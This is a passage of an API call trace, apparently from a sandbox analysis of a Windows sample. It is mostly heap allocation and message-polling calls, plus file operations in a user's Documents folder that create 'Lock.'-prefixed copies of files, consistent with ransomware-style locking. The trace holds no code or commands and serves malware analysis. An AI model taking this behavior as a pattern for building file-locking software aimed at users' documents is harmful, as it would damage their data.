lpMsg=0x8cf708) returned 0 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/uhe R_MajVPhj" (normalized: "c:\\users\\fd1hvy\\documents\\uhe r_majvphj"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0220.918] GetLastError () returned 0x5 [0220.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3855010 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.919] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0220.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0220.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0220.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0220.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0220.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854e48 [0220.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.920] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0220.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e48 | out: hHeap=0x2af0000) returned 1 [0220.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0220.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3855010 [0220.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.uhe R_MajVPhj" (normalized: "c:\\users\\fd1hvy\\documents\\lock.uhe r_majvphj"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0220.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0220.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0220.922] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0220.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0220.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0220.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0220.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0220.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0220.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0220.925] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0220.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0220.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab338 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0220.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0220.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0220.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0220.928] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0220.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0220.928] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0220.929] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.929] HeapFree (in: hHeap=0x2af0000, 